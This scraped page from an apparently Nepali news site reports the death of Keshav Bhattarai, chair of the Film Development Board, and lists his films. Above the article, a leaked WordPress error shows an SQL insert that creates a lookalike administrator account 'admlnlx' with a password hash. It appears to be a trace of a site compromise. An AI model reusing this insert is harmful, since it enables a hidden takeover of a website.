WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlDRrt7nM7FUl5J2.5yPbgbIgwExn61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:18:37', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, चलचित्र विकास बोर्डका अध्यक्ष केशव भट्टराइको निधन भएको छ । आइतबार राति १० बजेर २० मिनेटमा उनको उनको निधन भएको हो ।
स्वास्थ्यमा समस्या देखिएपछि उपचारका लागि ओम अस्पतालतर्फ लानेक्रममा भटराईको निधन भएको पारिवारिक स्रोतले जनाएको छ । उनको अचानक मृत्यु के कारणले भयो भन्ने बारेमा केही खुलेको छैन । ५४ वर्षिय भट्टराई पत्नी र छोरा रहेका छन् ।
निर्माता तथा कलाकारसमेत रहेका भट्टराइले निर्माण गरेका थुप्रै चलचित्रले बक्स अफिसमा राम्रो व्यापारसमेत गरेका छन् । करिब एक वर्ष अगाडि चलचित्र विकास बोर्डको अध्यक्ष पदमा नियुक्त भट्टराइले केही राम्रा कामको सुरुवातसमेत गरेका थिए ।
भट्टराई तीसकाे दशकभन्दा लामो समयदेखि चलचित्र क्षेत्रमा सक्रिय थिए । उनले बनाएका चलचित्रमा ‘आफ्नो मान्छे, पाहुना, कर्मयोद्धा, देवरबाबु, छोडी गए पाप लाग्ला, सो सिम्पल’लगायत छन् । उनले दर्जनौं चलचित्रमा अभिनयसमेत गरेका छन् ।